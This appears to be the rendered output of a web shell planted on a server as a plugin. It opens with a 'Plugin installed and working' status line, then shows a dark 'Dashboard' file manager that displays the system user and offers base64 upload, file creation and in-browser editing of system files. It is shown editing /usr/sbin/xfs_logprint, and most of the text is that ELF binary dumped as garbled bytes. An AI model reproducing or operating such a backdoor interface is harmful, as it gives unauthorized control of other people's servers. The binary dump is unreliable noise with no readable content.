{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-21 15:40:08"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Fsbin">sbin</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Fsbin" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: xfs_logprint</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/sbin/xfs_logprint">
                    <textarea name="edit_content">ELF          &gt;    pE      @       �Y         @ 8  @         @       @       @       �      �                                                                                        �      �                                           ��      ��                    �       �       �      �N      �N                   hK     hK     hK     x                          �K     �K     �K                              8      8      8      0       0                    h      h      h      D       D              S�td   8      8      8      0       0              P�td   +     +     +     &lt;      &lt;             Q�td                                                  R�td   hK     hK     hK     �      �             /lib64/ld-linux-x86-64.so.2               GNU   �          � �                   GNU ���v��;�ťM3�s�%         GNU                      K                 K   L   9�2����                        h                     �                     �                      �                      �                     u                     U                      �                     �                     �                     �                                             �                     �                     �                      �                     �                     #                                          g                      �                                           �                     �                      �                     1                                          �                     �                     }                     �                      �                     �                                                                   R                     Y                     �                                          .                     �                     D                     `                     �                      �                     �                                          )                                          �                      �                     �                                                                                    $                     �                                          =                     �                     8                     �                      �                     �                     x                                           ,                                            �                     �                     �                     F   &quot;                   M                     �                      q      Q            D    �P            K     Q             _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable __cxa_finalize __libc_start_main dcgettext stderr __fprintf_chk exit __printf_chk putchar __stack_chk_fail __memmove_chk __assert_fail uuid_unparse puts __ctype_b_loc free calloc malloc __memcpy_chk memmove setlocale bindtextdomain __xpg_basename getopt optind optarg strtol urcu_memb_init urcu_memb_register_thread open64 pthread_mutex_init close lseek64 uuid_copy getenv strtoul getsubopt urcu_memb_unregister_thread unlink fwrite abort __errno_location strerror perror ioctl pthread_self memset getpagesize memalign pthread_mutex_lock pthread_mutex_unlock __vfprintf_chk fputc pthread_mutex_destroy uuid_compare access strcpy setmntent getmntent strcmp hasmntopt endmntent pwrite64 memcpy getpid kill pread64 fstat64 fsync uuid_is_null realloc libuuid.so.1 liburcu.so.6 libc.so.6 UUID_1.0 GLIBC_2.3 GLIBC_2.14 GLIBC_2.33 GLIBC_2.4 GLIBC_2.34 GLIBC_2.3.4 GLIBC_2.2.5                                                                                   	      1         �&#039;�	   U        K         ii  	 ^     ���   h     ���   s     ii   ~     ���   �     ti	   �     ui	   �      hK            PF      pK            F      xK            xK      P            p�      (P            ��      0P            �      8P            ��      @P            ��      HP            ��      `P            
     hP                 pP                 �P                 �P            �P     �P            �P     �O                   �O                   �O        #           �O        C           �O        H           �P        L            Q        M            Q        K           �M                   �M                   �M                   �M                   �M                   �M                   �M                   �M        	           �M        
           �M                   �M                    N                   N                   N                   N                    N                   (N                   0N                   8N                   @N                   HN                   PN                   XN                   `N                   hN                   pN                   xN                   �N                   �N                   �N                    �N        !           �N        &quot;           �N        $           �N        %           �N        &amp;           �N        &#039;           �N        (           �N        )           �N        *           �N        +           �N        ,           �N        -           �N        .            O        /           O        0           O        1           O        2            O        3           (O        4           0O        5           8O        6           @O        7           HO        8           PO        9           XO        :           `O        ;           hO        &lt;           pO        =           xO        &gt;           �O        ?           �O        @           �O        A           �O        B           �O        D           �O        E           �O        F           �O        G           �O        H           �O        I           �O        J                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ��H��H��/ H��t��H���     �5r- �%s-  ��h    �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h	   ��Q������h
   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h   �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h   ��Q������h   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h    �������h!   ��������h&quot;   �������h#   �������h$   �������h%   �������h&amp;   �������h&#039;   ��q������h(   ��a������h)   ��Q������h*   ��A������h+   ��1������h,   ��!������h-   ��������h.   ��������h/   ������h0   �������h1   ��������h2   �������h3   �������h4   �������h5   �������h6   �������h7   ��q������h8   ��a������h9   ��Q������h:   ��A������h;   ��1������h&lt;   ��!������h=   ��������h&gt;   ��������h?   ������h@   �������hA   ��������hB   �������hC   �������hD   �������hE   ��������%) D  ���%) D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%�( D  ���%}( D  ���%u( D  ���%m( D  ���%e( D  ���%]( D  ���%U( D  ���%M( D  ���%E( D  ���%=( D  ���%5( D  ���%-( D  ���%%( D  ���%( D  ���%( D  ���%( D  ���%( D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%�&#039; D  ���%}&#039; D  ���%u&#039; D  ���%m&#039; D  ���%e&#039; D  ���%]&#039; D  ���%U&#039; D  ���%M&#039; D  ���%E&#039; D  ���%=&#039; D  ���%5&#039; D  ���%-&#039; D  ���%%&#039; D  ���%&#039; D  ���%&#039; D  ���%&#039; D  ���%&#039; D  ���%�&amp; D  ���%�&amp; D  ���%�&amp; D  ���%�&amp; D  ��AW�   AVAUL�-:�  ATE1�U��SH��H�5��  H��  dH�%(   H��$�  1�H�|$@H�|$�H��   ����H�5��  L���7���L��L�-��  ����L�๐   H��$`  H�|$L�%��  �H���&#039;    H�;�7����$����H��&amp; I��H�D$    D  L��H�މ��;������t��C��3wIc�L�&gt;��A��Hc�&amp; )Ń��)  �j  �[&#039; ���(    �H�=�&amp; �
   1��r����$땃2&#039; 댃5&#039; 냃�&#039; �w���H��&amp; ��&#039;    H��&#039; �Z�����&amp; �N�����&amp; ��&#039;    �8�����&amp;    �)����(    ������&amp;     ������&#039; ����   H�5��  1������   H���  L��H��1����1��D����y&amp; �n&amp; ���H��% ��&#039;    H�D$���H��H��&amp; H�������   1�H�57�  ��&amp;    �U����   H��1����������D�%�&amp; Ƅ$`   H�� Ƅ$�    H�-�&amp; H� &#039; L�-�&amp; Ƅ$�    L�5z&amp; H��&amp;     D%t&amp; H��&amp;     H��&amp;     H��&amp;     H��&amp;     H��&amp;     H��&amp;     H��&amp;     H��&amp; ��������~���H�=�% H��tFH�L$0H�T$8D����~  �Å��M  H�|$81�1��8���H�-�% H��%     A��H�-�% H���r  �=�%  ��  ��% �5�% D��H���/z  H��H��% �@t  H��% H���H�Q��% �ű  M����  �=e%  �G  �i% �5W% D��L����y  H��H�^% ��s  H��% H���H�Q��% �n�  M���
  �=%  ��  �% �5% D��L���y  H��H�% �s  H�3% H���H�Q�0% ��  H�=�$  �C  H�=�$  �o  H�=�$  �v  �=F$  u
�:$    D�53$ ��  D�%�$ �R���D��F�,�    H��H���z  D���@   �n���H�EpH����  D�e �E    ǅ�      Hǅ�      Hǅ�      D�mD�uhE��tZ�    A��  ��u	A���   A��   �uA����A��   �uA����A��   ���  B��    D�p���   �A�� H��! A��D�ulH�E8H��! H�E@H��! H�EHH��! H�EPH��! H�EXH��! H����  H�E`H�}1�E1������4H�EpL��1�I��H��H�H�@H� H�Ep�D8    H}pH�����D9�w�L�exH���  M�d$I�|$1�M�$$I��@A�D$�    �f���L9�uً�&quot; �(  H�=!�  H�-�! ��! ��  �  H�=�  H��! ��  �0   H�= �  ��  ��   H�=��  ��  ��   H�=��  �Ұ  �8   H�=��  �  H��! H���u  �H   H�=��  蠰  H��! H����  �(   H�=��  ��  H��! H����  �H   H�=��  �^�  H�_! H����  �8   H�=��  �=�  H�~! H���g  �X   H�=��  ��  H�! H���F  ��  H�=��  �  ��   H�=��  ��  H�! H����  ��   H�=��  �ɯ  H�! H���^  �H  H�=p�  訯  H��  H���=  �   �   ����?H)�Hk���H9�w��H�=@�  �rh�h�  H��  H����  ��   H�=+�  �G�  H�h  H����  �8   H�=�  �   �!�  �p   H�=�  H�V  �	�  ��$�    ��
  ��$�    ��
  ��$`   ��
  E��xD���b����	  H�=;  1�1�����Ń���L  1�1����d���H��$`  �   ��H��H�D$(�8�H=   ��  ����=   ��
  ��$`  H��$h  ȉ�$`  ��$d  ȉ�$d  �[/  H��$p  H��$h  �F/  H��$x  H��$p  �1/  H��$�  fo�$�  H��$x  )�$�  �/  H��$�  H��$�  �.  H��$�  H��$�  ��.  H��$�  H��$�  ��.  ��$�  H��$�  ��$�  f��ȉ�$�  ��$�  f��$�  ��ȉ�$�  ��$�  ȉ�$�  ��$�  ȉ�$�  ��$�  ȉ�$�  ��$�  f��f��$�  ��$�  H��$�  f��f��$�  ��$�  f��f��$�  H��$�  H��$�  ��$�  ��$�  H��$�  H��$�  ��-  H��$�  H��$�  ��-  H��$�  H��$�  �-  H��$�  H��$�  �-  H��$   H��$�  �-  H��$  H��$   �}-  H��$  ��$  f��f��$  ��$  f��$  ��$  ȉ�$  ��$  ȉ�$  ��$  ȉ�$  ��$   f��$   ��$&quot;  f��f��$&quot;  ��$$  H��$H  ��$8  Ǆ$@      ȉ�$$  ��$(  ɉ�$8  ȉ�$(  ��$,  ȉ�$,  ��$0  ȉ�$0  ��$4  ȉ�$4  ��$&lt;  ȉ�$&lt;  ��$D  ȉ�$D  �e,  H��$P  H��$H  �P,  H��$P  f��u	����  H��$�  H��$X  ��H��$    uHǄ$   ����H��$   uHǄ$  ����H��$H   uHǄ$H  ������$�  �у�f��tq��$  �t�ƃ�f���f��f�� 	� t�ƃ�f���f�� �f�� 	�ƃ��f��$  �t&quot;H��$  H���tH��$H  HǄ$  ����1�H��$p   ��H���� tH����tH����@tH���tH����tH�� ��tH����t���tH��@��@t��f���]	  f����   ��$4  ����  H��  ��tH   ��tH   ��tH  � ��$8  ��tH   ��tH   ��tH    ��tH   ��tH   �� tH   ��$�  ��$�  �#    H��$�  ��$�  D�A�H�$�  D��H��$�  ��D��$r  ��H��H�� ��$�  H���H�փ�����!�H�D��H��H�� �@t��$!  �   ��	��� H=$ ��  H�= H��t	�? ��  H�-: H�-; H�&lt; E1�E1�E1�H�=��  L�= H�&amp; H�D$ �\�H�D$0H��u-��   H�|$8H����  1�1���I��H�D$0H����   �8 ��   H�T$8H�|$0H������tT��t���tjL�d$8�   H�53�  1����H�=] L��   H��1����   �Q�H�v     ���H�|$8H���  1�1��
�I���_���H�|$8H���  1�1����I���@���H��$X  H���  H;h8�g  H�L$H9�Y  H��$`  M���  I9��  L;z8��  H�D$H9��  H�L$ H��t H��$h  H;H8��  H�L$H9��  �-� ��y�-� L�% �   H�5M�  1�����   H��L��1���L�% M���  �   H�51�  1���L��   H��1��M�L�-&gt; 1�L�%= �   H�5(�  �\�L��L��   H��1���H� H=�����  �D$hHc H��$`  H�  H��	H�T$XH�� ��$�   H�D$H�T$`H�D$P�� ���  !����  ��u�4$H�|$��  1��S���u�H�|$��  ��  1���A�Ń����	  H�|$1҉�E1�L�=��  H���  �  L�5��  D�,$L�l$(�/�   L��1��\�M��H�پ   H�=� H��1�� �I��HcD$hI9���  �   L���������  ��  =   u��&lt;$�   L��������  =   t��   L���{���H�= H���  H�=w H���/  H�=o H����  H�[     H�H     H�5     �o ����H�h �����c��   ��H��$�   ����L���H��$`  ���V���H��$�   ���6���H�L$0H�T$8D��H���~n  �Å����H�\$8�� D��5� H���j  H��H�� �)d  H�� H�߉�H�Q�� 计  ���H�=* H��$�   ���H��$   H�r     �|    H��	H�U ����H�L$0H�T$8D��L����m  �Å��P�L�l$8�� D��5� L���mi  H��H�� �~c  H� L���H�Q� ��  ��H9������L�%� �   H�5��  ����H��     �_�H�L$0H�T$8D��L���8m  �Å����H�l$8�c D��5V H���L�H�0�  ��   H�5��  H�=��  ���L�%&lt; �   H�5/�  ���H�H     �4�H�=t �_�  H�=� H�]     �H�  H�=i H�f     �1�  H�=J H�G     ��  H�=+ H�(     ��  H�     H�q �(   �   H�=��  �{��&amp;�H�=� �ʢ  H�=� H��     賢  H�=� H��     蜢  H�=� H��     腢  H�=� H�s     �n�  H�=O H�d     �W�  H�4     H�� �+   �   H�=�  ����z����8��1��   H�5�  H�D$��L�L$M��H��H�=t H�¾   1������1�1����ǃ����  �G�H�-h �0����i  �����i  H�=U H������H;== �����ji  ������$(  ��t����t���t�����{���H   �p���D��A����H�\$L��H��H����k  H��$X  M��tI9�tL��L��H���k  H�t$ H�|$L��H��$`  �k  H��$h  ���H�FQ  ��H�|$E1�1҉�E1��A�����D�  L�==�  L�4$L�t$(�A9��   I��HcD$hI9������   L�����(����-  �  H��$`  H�H�� L9���   �=�  ��   H��$x  D��$�  �   H�5��  D��$l  A�D�T$ A�D�L$�,   ��$d  1�H�D$ɉL$��D�T$ L��   H��1�ARD�L$ AQL�D$ �L$E��I�� ��XZ��$`  A��A�=������D��$d  A�����   L��1�D�L$��D�L$A��L��H�$H�ƿ   1��G���$`  ���=��u	��$d  �L�$$������8�&#039;�1��   H�5@�  H�D$�/�L�L$M��H�=� H��H�~�  �   1�����\����$H�|$���2  �&#039;���H�� �$�L�%� �   H�5C�  1�1����H�=C L��   H��1��q���L�%� �   H�51�  ��L�%p �   H�5D�  �H��$X  H��$X  �m��T�1��   H�5z�  �U�L��   H���  H��1����m���D�,$D�����\���1��   H�58�  D�,$��L��   H�x�  H��1������O�D�,$�8���1��   H�5�  H�����I��M��   H�=&lt; H��1�H�(�  �k��s����   H�5��  1���H�= �   H��1��=��   ������8�G�L�%� �   H�5M�  H��1��J�I��L��   H�=� H��1�����   ��H��1��*�����p��8���L�%r �   H�5�  H���L�%� �   H�5B�  ���H�=��  ���   �S�1��   H�5ͻ  ��H�=) �   H��1��Z�����   H�5�  ����   H�5�  �����   H�5��  ����L�%; �   H�5O�  �_�L�%# �   H�5�  �G�f���1�I��^H��H���PTE1�1�H�=a��C
 �f.�     H�=9 H�2 H9�tH�&amp;
 H��t	���    ��    H�=	 H�5 H)�H��H��?H��H�H�tH��	 H��t��fD  ��    ���=  u+UH�=�	  H��tH�=F ���d�����
 ]� ��    ���w����    AT�   L�%
 1�H�5��  �$��H�=�
 L��   H��1�����   ���AUATA��UH�-�  SH��(dH�%(   H�D$H�H�D$�GH��D$&lt;it&lt;�H�-ؼ  H�˼  HE�\$D�l$�   1�H�5l�  ����I��A��H��D��   1�A�D���G��   H�5ż  1��d���   H��1��%��\$���  ����   ����   ����   �� up��uK��u.H�D$dH+%(   �  H��(�
   []A\A]���fD  H�59�  �   1����� 1�H�5�  �   �����t���fD  1�H�5�  �   �u�����y�����f.�     1�H�5��  �   �M���� �L����f�1�H�5��  �   �-�����&#039;�����f�1�H�5k�  �   ������������f�1��   H�5w�  ����   H��1�����������@ AWAVLc�AUATUH��S�˹X   H��X  L�/H�T$�X   H��$�   L��dH�%(   H��$H  1�A��XIF�M��w��L�m f��$�   &lt;�
  H�5�  �   1�M���M����$�   D��$�   L��$�   D��$�   D��$�   �D$A�FA9���  A����	  1��   D�L$H�5U�  � ��AWL��   AVD�t$(H��M��D�L$1�E1�D��E������^_M��H�L$D��A�ǃ��1�9��R  �D$    �H��L$����   �&gt;  fD  H�u ����=XAGI��  ��FGAX��  ��QD  ��  �   H�5��  1��p���   H��1��1���# ���3   A�Fȉ�HE �l$�D$�����  H�D$E1��0H�D$��H��0L�u L������E���V����   H�5��  1������   H��1����A�Fȃ���   �   H�5q�  1������   H��1�����^���fD  A���9  �   H�5�  1�����T$�   H��1��H��H��$H  dH+%(   �  �D$H��X  []A\A]A^A_� �
   �^��H�E 1��   H�5��  L� L�x� ���   H��I�1�L��I�L������H�E 1��   H�5��  L�`L�x�����   H��I�I�L��L��1�����v���fD  L��$�   �+   �   L���H�H�5p�  1�����   H��1��[��A�Fȃ�&#039;w�   H�5*�  ����    �
   �~��D��$�   �   1�H�5�  �C��A̿   D��H��1����D��$  1�D��$   ��$�   D��$�   �   H�5��  A�A�D�L$D�D$�A�����D�L$��D��D�D$H�ƿ   1����D��$  �   1���$  D��$  H�5t�  A�D�D$���D�D$�A�H��D��ٿ   1��I��A�F���=   ���  ��   ��  A�@   A�F	��  A�D$�H�l$�   ����L�,�    @ �   H�5�  H�k�1�����K��S��   H��1�����A9�~A�T�(H�5 �  �   1�����H��H9�uؿ
   H������I9�u�H�l$�g����    M���/���A�F	��&lt;�\$����� �o�oN�   1��oV �o^0�of@�onP)D$ H�F`H�5�  )L$0)T$@)\$P)d$`)l$pH��$�   �6���   H��1����A�Fȃ�g�C����
   �.���\$$1��   D�|$#D�d$&quot;H�5 �  ����˿   A��D��H��D��1����L�|$0L�d$(1��   H�5	�  ���IϿ   L��H��I�1�L���i���\$\L�|$H1�D�d$b�   H�5�  �w��˿   A��fA��H��I�1�E��L��D���!��L�|$@L�d$81��   H�5٥  �4��IϿ   L��H��I�1�L�������\$XL�|$P1�D�d$`�   H�5ĥ  ����I�A��fA��H��L���   E��1�D������|���@ �o6�o~�   1��oF �oN0�oV@�o^P)�$�   �of`�onp)�$   �o��   �o��   )�$  )�$   �o��   �o��   )�$0  �o��   )�$@  �o��   H�5�  )�$P  )�$`  )�$p  )�$�  )�$�  )�$�  )�$�  )�$�  �����   H��1����A�Fȃ�?������
   ������$�   �   1�D��$�   D��$�   H�5��  ���˿   A��H��A�A�D��D��1��L��D��$  1�D��$   �   H�5��  �Y��AϿ   D��H��A�1�D�����D��$  1�D��$  �   H�5p�  ���AϿ   D��H��A�1�D��������$(  1�D��$$  �   H�5ۢ  ��$   D��$  D��$  �AɉL$D�L$�A����H��A��A̋L$$H��D��   1�QD�L$ D���[��ZY�4���@ ��)�)؉D$������   1�H�5.�  �[���   H��1����1��   H�5&#039;�  �9���   H��1�������D  A�FH�] L�%~�  ��A��u+�\D  �L��   1�A��H�����A��t)E9�t3A��u�D��H�54�  �   1�����fD  �
   ����E9�uͿ
   ����J���A�   �F���A�1   �;���H�ͻ  ��   H�5Ӱ  H�=װ  ���H���  �  H�5��  H�=հ  ����Q��H���  �  H�5��  H�=&#039;�  �b��f�AWLc�AVAUM��ATI��USH��H��  H�6H�&lt;$dH�%(   H��$x  1�A��8��  L�\$@�8   L��E��L��D�����A�$I��A�G�L;��D	���  M��A��8tUH�D$@�o\$TL��$�   H��$�   �D$H�$�   ��$�   H�D$LH��$�   H�D$dH��$�   H�D$lH��$�   �   H�5!�  1��8���   H��1����E�oI�O1�E�O
E�w�   H�5��  H�L$D�L$fD�l$8����D�L$E��D��H�L$H�ƿ   1����E�G4A�O01�M�(�   H�5�  D�D$�L$���D�D$�L$L��H�ƿ   E�}�1��^��A�4$9���  H�H��H��H�D$�o�H�D$�@	��  H��   H�5;�  1��o �oh�op �ox0)�$�   �o`@��$�   )�$�   �ohP)�$�   �op`)�$�   �oxpL��$�   )�$   �o��   )�$  �o��   )�$   �o��   ��f% �)�$0  )�$@  )�$P  )�$`  �L$ f�D$:D�|$&lt;����   H��1��P����$�   �   1�D��$�   H�5�  D��$�   �D$D�\$D�L$�E���L$ D�L$�   D�D$�T$H��1�������D��$�   �   1�D��$�   ��$�   H�5�  D�L$D�D$ �L$����D�D$ �L$�   �T$H��1����Lc�$�   �   1�Hc�$�   Lc�$�   H�5V�  L�D$ H�L$L�L$���L�D$ H�L$�   H�T$H��1��D��H��$8  H�D$0���  D��$  D��$  1��   H��$   H�5�  L�L$ D�D$H�L$�%��L�L$ D�D$L��H�L$H�ƿ   1�����D��$  D��$  1��   H�5��  D��$  ��$  L�\$(D�L$ D�D$�L$���D�L$ D�D$�   �L$H�T$(H��1��j����$  1�D��$  �   H�5��  �L$D�D$�n���L$�T$�   H��1��&#039;���|$��  H�$E�}�H�@H���  % @  H��H�H��H�   HD���0���a  �� u&quot;�   H�5#�  1�����   H��1����f�|$8��  f�|$8�g  f�|$8�.  D��%�  �l  D��L�����  A�$���$9���   �rL��H��L�D$A�4$���$L�D$=�   ��  =   ��  ��@�&#039;  H���  ��  H�5��  H�=&#039;�  �z��f.�     H�F0�o�oN�oV �L;H�D$p)D$@)L$P)T$`A���p  D�|$B�   H�58�  1������   H��D��1����H��$x  dH+%(   �)  H�Ĉ  D��[]A\A]A^A_� L��$�   D��$  1��   H��$   H�5R�  L�L$ D�D$H�L$�f��L�L$ D�D$L��H�L$H�ƿ   1����D��$  �=����     E1��Y����     A�$�U��$9��?����pL��H��L�D$A�4$���$L�D$���Y  ���$  ����   H���  ��  H�5#�  H�=r�  ���D  �   H�5��  ����    D��L����i���D��%�  ����E���B���H���  ��  H�5��  H�=3�  ��� ��$@  1��   H�5��  �L$�2���L$H�T$0�   H��1���������1��   H�5~�  L�$����   H��1����f�|$: @L�$�   A�@ȉ�HH�A�@	�����E�}�I���0���L�$�   H�5�  1�����   H��1��c��L�$�L�$�   H�5Ω  ��L�$�   H�5�  1��d���   H��1��%��L�$A�@ȉ�HA�@	�l���A�����1��   H�5�  L�$����   H��1�����f�|$: @L�$u��   H�5|�  1������T$&lt;�   H��1����L�$�L�$�   H�5|�  �S����   H�5;�  1�����T$&lt;�   H��1��h��L�$������H���  �O  H�5٦  H�=��  ���H���  �w  H�5��  H�=��  ���H�u�  �x  H�5��  H�=��  �m��ff.�     f�AWAVAUATUSH��XdH�%(   H�D$H�����  A��A�=����  �GH��I��A��Aυ�u&amp;H�  u�O(��u��@  ����  f.�     D�sD�k�   1�H�5��  ���Aο   D��H��A�1�D���J��H�sH�=��  �Z�  H�sH�=�  �J�  �
   �p��D�s(D�k$1��   H�5R�  �5��A�D��E��H�ƿ   1�A�D���������  ����   I��H��0  L���w���   H�5��  1�����L��   H��1������,  ʃ��a  w���&#039;  �   H�5�  �f�     ���  �   H�5�  1�����   H��1��E��D��@  �   H�5��  1��[���   H��A�1�D������C�A�$D�c(A�H�D$HdH+%(   �-  H��XD��[]A\A]A^A_�1��   Mc�A�@   H�5#�  I��  L�5,�  ����I��	�   H��1����E9�EN�1�E��~%D  �L�,��L���   1�H����u��A9��
   ��������   H�5Ѧ  ���    H�5��  �   1��5������   H�5��  ����A�����������1��   H�5�  �.������D��   H��1���������A����������    A��������� ��AUATI��UH�-1�  SH��H��H������=��uPD�kAͺ   H�5M�  1����L��D��   H��1��i��H���A���[�  ��uH��[]A\A]�@ A��A��H�=�  1��bU  f�ATI��UH�-��  H��H������   H�5�  1��4��L��   H��1�����H���������  ��uH��]A\��     H�=ť  1���T  f���H��H��D  �����ȁ���u�G���     ��AVAUI��ATA��US����   ����L��H�0A�D$�M�DL���@ H��I9�tg��DV@u�1�L�-N�  L�5A�  �, �U L��   1��������tU��txH��A9�tZ��u҉�L���   1�������    [L��]D��H�5�  A\�   A]1�A^�����    �
   H�����A9�u�[�
   ]A\A]A^��� �    �����y���f�     AWAVA��AUD���  ATA�� ���UL��SH��  H�|$ H��$P  �T$L��$X  dH�%(   H��$  1�Ic �����  I�A)�Ic�H�T$XL�&lt;H��L��D��L�L$H�L$����H�L$L�L$����_  �U ����b  ��@��E����@����  A9���  D�Hc�H�D$X�D$T    H�H�D$H9���   �     ���΁���uBH�|$��������H��$  dH+%(   ��  H��  []A\A]A^A_�f.�     �S�9�t�} �t���9�u�HcT$T��?�L  �T�,�H�D$X�D$TH   H�D$XH9��h���H�D$D�d$�D$T    H�D$XE����  H�\$�D$    L�5T�  L�d$XD�|$L�-�   L������t$TL��H������S	A��A����   �k����  ���  ����   �H�n�  �H��H���P  �     ;G��  H�?H��u�kͅ���  L�\$XA�;NART�  E��E�A����E��fA��G�7  fA��5��  A����f����  H���  ��Hc�H�&gt;��M���  �փ�?��Hc�H��H��H�I��������T�����D��  E���!���D�SE����  H�D$XL��   1��1��j���f.�     H�T$X��H�BH�D$X�C�9���  �RL��   1��/��������uſ
   �k����f�     Hc�L�H�D$XA�����  �   H�5͒  1��   �����   H��1������   �   �衿��H���  ˉh�XH�H�@    H��tH�BH���  �D$T���D$TA9�~_H�\$X����D  �otz�   H�5&amp;�  1�菾���   H��1��P����C�D$   ȉ�HD$X�D$T���D$TA9��@ �
   �n���H�|$�T���1����D  ��u����fD  H�H9���   H��tH�WH�PH�H�WH������Y���fA��nU��  �   H�5p�  1��ܽ���   H��1�蝿���D$T����@ �
   �ּ���D$T���D  H�s�=~�  H���  H��	H�A��L�Lc�L9���  E��@�ƅ���@��u	A9��~����E �����M�9���@ H�!�  H���;���H�@    �.����̉�D�ȿ   A�ȉ���1���H�5�  L�\$���Ծ��������L�\$�   H�5��  A�kA�[1��ۼ����ڿ   H��1�蘾���D$T���Ic�L�L$H��H�L$����H�L$L�L$H��H�D$XI���N���L�%h�  �   H�5��  1��u���H�=��  L��   H��1������   ���f�D�D$D��$`  E����  �|$����  �   H�5��  1�H�-��  ����D�D$�   H�=��  H��H��1�E��貾���5��  ���2����C�D$    ȉ�HD$X�D$T�����   L�޹   L�\$9�H��$�   Fŉ�聼��L�\$��L�H�D$X����  H��$�   �   H�5�  1���$�   �f���H��   H�Ɖ�1��&quot;����D$T�����(��  �(   L�\$衼��L�\$H��I����
